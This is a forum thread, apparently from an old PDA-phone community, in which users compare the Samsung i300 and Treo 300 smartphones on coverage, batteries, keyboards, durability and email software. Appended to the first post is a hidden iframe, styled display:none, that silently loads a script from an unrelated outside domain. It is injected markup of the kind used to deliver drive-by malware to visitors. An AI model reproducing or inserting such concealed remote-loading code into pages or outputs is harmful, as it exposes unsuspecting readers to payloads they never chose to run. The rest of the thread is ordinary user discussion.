+ Reply to Thread

Samsung i300 vs. Treo 300

Fellow I300 users,

Do anyone have any ideas or feedback on the major differnces between the i300 vs. the Treo 300?

Both phones seems to be older but definately solid devices. I was just curious if anyone had opinions or uses of both devices and could give some sound advice.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

K7AAY Treo 650/Cing & Nokia9300/TMo johnbartley's Avatar

Some differences

Treo 300 is digital-only. Unilke the i300, it CANNOT use analog. You know why GM's OnStar uses analog? Because, by FCC mandate, it's there everywhere there's cellular. If your car breaks down in East Mudflap, being digital-only means you're likely walking to a phone.

Treo 300 is PCS-only. Unlike the i300, it can't use 800mHz band cellular, only uses 1900mHz. Verizon and other CDMA carriers use 800mHz - do you want to be able to roam off Sprint?

Treo only has an internal battery, unlike the i300 which has swappable battery packs. Yes, color screens and analog cellular capability suck batteries, so Samsung includes two standard batteries with every i300, and extended run time ('jumbo') batteries are available which use the same charger.

Treo 300 has the thumboard, and you must buy RecoEcho or some other software for Graffiti. The i300 uses Grafitti, and you can buy a snap-opn thumboard if you prefer it.

Treo is wider and thinner; fits in a shirt pockert better. i300 is longer and thicker; fits better in pants pocket (although remove it before you sit down). Better to get a Slipper Case from ebcases.com (which accomodates the jumbo battery well).

Treo's flip lid reduces screen smear compared to the i300. However, I found I smeared up the lid window, inside and out. Use screen protectors, regardless.

Audo seems better on the i300, in noisy environments especially.

Bear in mind I've lived with the i300 since it first came out, and only used a Treo for two weeks.

Conclusion: Treo veyr nice, i300 nicer.

Treo 300 vs. i300

Wow!

That's good feedback.

I've been concerned about the Treo 300. The i300 has a great support group here on pdaphonehome and seems to be hackable to do just about anything (don't throw the tomatos).

One would suspect the Treo 300 to be a far superior product. Then again, the i300 seems to be such a enticing phone that even I had to come back to it.

I'm welcome to more feedback. I'm' sure most users who have the i300 vs. the Treo 300 has at least considred both phones at one time.

What held you back?

sprint pcs beta tester macmetal666's Avatar
    as a tech on both units i can say a lot!!!!
    for both units (and this is the only likeness for both) is that the ergonomics on both are poor at best. the thumboard is a total waste for any one with fingers, and the i300 need to use the stylus all the time(the ppc units or palm 4.1 and up you can easily use your fingers)

i have had more bad happen with the treo however. batteries swelling to 3x their size, screens going completely blank and white, and the most common, hinges falling off making the earpiece unusable and unrepairable.

only bad about the i300 is it is not as hackable as the treo. the treo has less of a tendincy to want to crash when hacked.

best bet is to stick to the i3.

btw looking for a slightly used i300? i have a few (most only turned on ,tested and then put back in the box! cheep and all parts are there!
    my i500 is more obsolete than your ti-99 or apple IIe

Writing on screen

Well, I have short and wide fingers, yet I can write OK on the screen protector .

However, if it just don't work for you, and you find the 'nail' stylus of the i300 or the stubby stylus of the Treo uncomfortable, try this $5 wonder, which I got at Fred Meyer's:

http://www.bicworld.com/inter_us/bdd...product_id=106

Treo 300 vs. i300

I think something that was brought up earlier.

1. 2 Batteries on i300 vs. 1 Battery on the Treo 300.
    2. i300 Dual Band vs. Single Band on Treo 300.
    3. Returns on i300 vs. Treo 300

I noticed the i300 looks and feels a little more sturdy than the Treo 300. Is it just me or are we talking about a the Treo falling apart with a couple of incidental drops?

Durability

I drop my i300 a lot. I carry it in the ebcases.com slipper case, and after two years, it's still running fine.

I hesitate to think what would happen if I tropped a Treo. The are much lighter.

i300 vs. treo 300

Well, considering your thoughts and some others (i'm still open), it's apparent the i300 is more portable pick in terms of use.

Something that I have read on other posts keeps popping up in my head....

The dual band phone thing along with the wireless web minutes. Even though we are talking about 14.4 or 28.8 (whatever the transfer rate is), you can still get external pop emails on the i300 with eudora. I believe its the same for the Treo 300 but the dual band phone option is a heaven sent.

POP/SMTP e-mail

Eudora is nice, but somewhat prone ot mystery errors. Instead, I switched last month to GNU Got Mail
    http://rallypilot.sourceforge.net
    which take mail created with the Mail program included with your PalmOS machine, sends and receives wirelessly. Much less smace and no hassles.

sprint pcs beta tester macmetal666's Avatar
    dont waste the time or $$$ on the treoooooooshootijustdropthisdamnthinganditbrooookeopennnnnn 300 dollar paperweight......same goes for the i330. damn things spend more time in my shop than my cubemates leftover chinatown express in the fridge.

either caugh up the coin and go for the i500 or save a few bucks with the i300(which can do almost the same things!)
    my i500 is more obsolete than your ti-99 or apple IIe